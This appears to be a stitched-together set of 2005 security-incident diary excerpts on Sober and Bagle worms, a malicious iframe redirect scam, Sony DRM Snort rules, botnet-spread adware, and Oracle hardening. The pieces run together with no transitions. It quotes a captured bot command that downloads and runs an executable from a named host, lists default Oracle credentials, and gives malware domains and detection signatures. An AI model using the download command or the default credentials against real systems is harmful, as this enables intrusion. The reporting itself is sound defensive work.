• http://www.php.net/
• http://www.php.net/ChangeLog-5.php

sc stop MSDTC & sc config MSDTC start= disabled

To everyone in the US, hope you have a safe and happy Thanksgiving weekend.

We continue to receive reports about new Sober variants. Thanks to Chris M. for supplying a very comprehensive list of links (see below). the CME system assigned these variants the ID CME-681.

IMPORTANT: Antivirus software does not provide any reliable protection against current threats. Viruses like Sober tend to change every few hours well in advance of AV signature updates. The fact that an attachment did not get marked is no indication that it is harmless. We do receive reports of up to date versions of AV software missing some of the recent Sober variants.

Sober is now considered the "largest virus outbreak of the year" according to F-Secure (thanks Matthias J. for pointing this out). It looks like the fake FBI e-mails are working for them.

Note from reader Marc R: Please do not have your AV software reply to viruses. All commonly seen viruses use fake 'From:' headers. Rumor has it that fbi.gov is having a hrad time keeping up with all the bounces in the first place.

One not of interested: We had another Sober outbreak last year in June, around the same time we had the "Download.ject". Download.Ject (aka Berbew) used a Internet Explorer 0-day exploit to download and install a trojan. A number of well known, trusted, web sites had been compromissed and spread the trojan.

None of these does anything new or fancy. They all try to trick users into executing the attached ZIP file. The best defense at this point is probably to strip ZIP file attachments.

The subjects and the body text vary widely. Many of them suggest that the attachment was sent by some government authority (FBI, CIA) and requests that you open it in order to verify some charges brought against you. A version in German refers to the 'BKA' (German equivalent of FBI). Other versions claim to be sent by banks and ask you to open  an attachment to verify account details.

List of Links:

Symantec (Level 3 risk) W32.Sober.X@mm

http://securityresponse.symantec.com/avcenter/venc/data/w32.sober.x@mm.html

McAfee (currently Low risk) W32/Sober@MM!M681
http://vil.nai.com/vil/content/v_137072.htm

Trend Micro (Medium risk) WORM_SOBER.AG
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FSOBER%2EAG

F-Secure (Radar Level 2) Sober.Y
http://www.f-secure.com/v-descs/sober_y.shtml

Sophos (low risk) W32/Sober-{X, Z}
http://www.sophos.com/virusinfo/analyses/w32soberx.html
http://www.sophos.com/virusinfo/analyses/w32soberz.html

Computer Associates (Medium risk) Win32.Sober.W
http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=49473

Panda Antivirus (Medium risk) Sober.Y
http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?IdVirus=92673&sind=0

Top Vulnerabilities in Windows Systems

• W1. Windows Services
• W2. Internet Explorer
• W3. Windows Libraries
• W4. Microsoft Office and Outlook Express
• W5. Windows Configuration Weaknesses

Top Vulnerabilities in Cross-Platform Applications

• C1. Backup Software
• C2. Anti-virus Software
• C3. PHP-based Applications
• C4. Database Software
• C5. File Sharing Applications
• C6. DNS Software
• C7. Media Players
• C8. Instant Messaging Applications
• C9. Mozilla and Firefox Browsers
• C10. Other Cross-platform Applications

Top Vulnerabilities in UNIX Systems

• U1. UNIX Configuration Weaknesses
• U2. Mac OS X

Top Vulnerabilities in Networking Products

• N1. Cisco IOS and non-IOS Products
• N2. Juniper, CheckPoint and Symantec Products
• N3. Cisco Devices Configuration Weaknesses

Back in July, I already posted on the subject (Who needs .info/.biz, anyway?), and it turns out that the same scam is still in operation today. By putting too much trust into the topmost result returned by a search engine, a user of mine ended up ringing quite a few bells on the IDS and AV late yesterday night. Turns out the page the user got redirected to was hxxp://iframebiz.biz/dl/adv443.php (DONT click).

The content returned by this link is obfuscated and encoded JavaScript. Once decoded, it reads as follows (included as an image, to keep your antivirus from panicking):



Yes. A bunch of malware, no doubt, and trying to exploit quite a number of recent and not-so-recent vulnerabilities commonly found on a badly patched Windows workstation.  The Trojans it tries to download are by now pretty well known and recognized by most of the anti virus software. What irks me most, though, is that this sort of thing has been around for months. Checking with a DNS cache, I found that no less than nine different  DNS names have been used for this scam within the past week alone.

traffsale.biz 81.9.5.10; iframesite.biz 81.9.5.10; iframetraff.biz 81.9.5.10; toolbartraff.biz 81.9.5.10; buytraff.biz 81.9.5.10; iframecash.biz 81.9.5.10; toolbarurl.biz 81.9.5.10; iframebiz.biz 81.9.5.10; toolbarbiz.biz 81.9.5.10;

And guess what country 81.9.5.10 resides in ?  Yes, one of the CWIIAC, country-where-ISPs-ignore-all-complaints. I'm about to send them one more.

FBBF 76CC 51D5 D4F5 504E  7368 085E B5C1 9C0E C441

#By Michael Ligh
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS \
     (msg: "BLEEDING-EDGE MALWARE Sony DRM Reporting 1";  
      flow: to_server,established; uricontent:"/toc/Connect?type=redirect"; nocase;  
      uricontent:"&uId="; nocase; classtype:trojan-activity;  
 reference:url,www.sysinternals.com/blog/2005/11/more-on-sony-dangerous-decloaking.html;  
      sid:2002675; rev:3;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS 
          (msg: "BLEEDING-EDGE MALWARE Sony DRM Reporting 2";  
          flow: to_server,established; content:"sonymusic.com"; nocase;  
          pcre:"User-Agent:[^
]+SecureNet[^
]+Xtra/i"; classtype:trojan-activity;  
  reference:url,www.sysinternals.com/blog/2005/11/more-on-sony-dangerous-decloaking.html;  
          sid:2002674; rev:2;)


#by Blake Hartstein
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
      (msg:"BLEEDING-EDGE Malware Sony DRM Related --  
       CodeSupport ActiveX Attempt"; flow:from_server,established; content:"CLSID"; nocase;  
       content:"4EA7C4C5-C5C0-4F5C-A008-8293505F71CC"; nocase; distance:0;  
       reference:url,www.frsirt.com/english/advisories/2005/2454;  
       reference:url,www.hack.fi/~muzzy/sony-drm/; classtype:web-application-attack;  
       sid:2002679; rev:3;)


Link to rules on "Bleeding Snort"

• Thanks for your registration.
• Hi, Ich bin's

I am sure you already know about botnets, right? Ok, I am quite sure that you also know that one of the purposes of the botnets, besides all the nice stuff written by our Handler Mike Poor in his diary Big Business surrounding Internet Fraud , is to spread malware, right? Ok (again), today I would like to show you how the botnets are also spreading adware/spyware softwares. As the bot is remotely controlled by the botnet owner, it can do anything...
While investigating a bot today, I found this instruction to the bot:

:MySQL 332 USA|xxxxxxx #c :xdownload32 http://news-affairs.com/ysb.exe c:\ysb.exe 1

This instruction told to my bot to download the ysb.exe 'software' to my computer and open it, as the next messages can show:

#c :[DOWNLOAD]: Downloading URL: http://news-affairs.com/ysb.exe to: c:\ysb.exe.
#c :[DOWNLOAD]: Downloaded 67.3 KB to c:\ysb.exe @ 33.6 KB/sec.
#c :[DOWNLOAD]: Opened: c:\ysb.exe.

As soon as it downloaded it oppened it, this window came up:



This 'software' is recognized by some AV at VirusTotal as a downloader or ISTbar.
Nice points from the License Agreement:

9. OTHER SOFTWARE. You allow that third party software may be installed in the Software and the Integrated Search Technologies shall not be liable to anyone with respect to such third party software.
16. UPDATES. You grant Integrated Search Technologies permission to add/remove features and/or functions to the existing Software and/or Service, or to install new applications or third party software, at any time, in its sole discretion with or without your knowledge and/or interaction. By doing so, you agree to the terms of the new applications. You also grant Integrated Search Technologies permission to make any changes to the Software and/or Service provided at any time.

Ok, ok...old stuff, but always nice to know how these things suddenly appears in your computer...:)
------------------------------------------------------------------
Handler on Duty: Pedro Bueno

We have received numerous reports of new Bagle variants being spammed. They look typical for this family of worms – empty message body with a ZIP file in the attachment.
Some of them don't have any subject and the sender name will be same as the recipient name with (sometimes) random domain appended.

Some names that have been used are:

Max.zip
Business_dealing.zip
Text_sms.zip
Health_and_Knowledge.zip
The_new_prices.zip
Info_prices.zip

MD5 sums of some variants are:

8275444ac2caac4b90bfd07d0b2b17be    t_535475.exe
18ae7a2fa4dbbf703c3ae157f224186a    text.exe

In the archive there is an executable which, when executed, copies itself to %sysdir%\hloader_exe.exe and drops another DLL header_dll.dll. It also creates an entry in the registry key HKLM/Software/Microsoft/Windows/CurrentVersion/Run named auto__hloader__key.

Thanks to Mike S, Sean K and others for submitting samples and information about these worms.

• system/manager
• sys/change_on_install
• dbsnmp/dbsnmp
• outln/outln
• scott/tiger
• mdsys/mdsys
• ordcommon/ordcommon

• Change the Oracle listener from the default port of TCP/1521 (and set a listener password while you are at it)
• Drop or lock default user accounts if possible.  Ensure all default accounts do not use default passwords.
• Revoke PUBLIC privileges to the UTL_TCP, UTL_INADDR packages.
• Revoke CREATE DATABASE LINK privileges granted to users who do not need to link to remote databases, including the CONNECT role.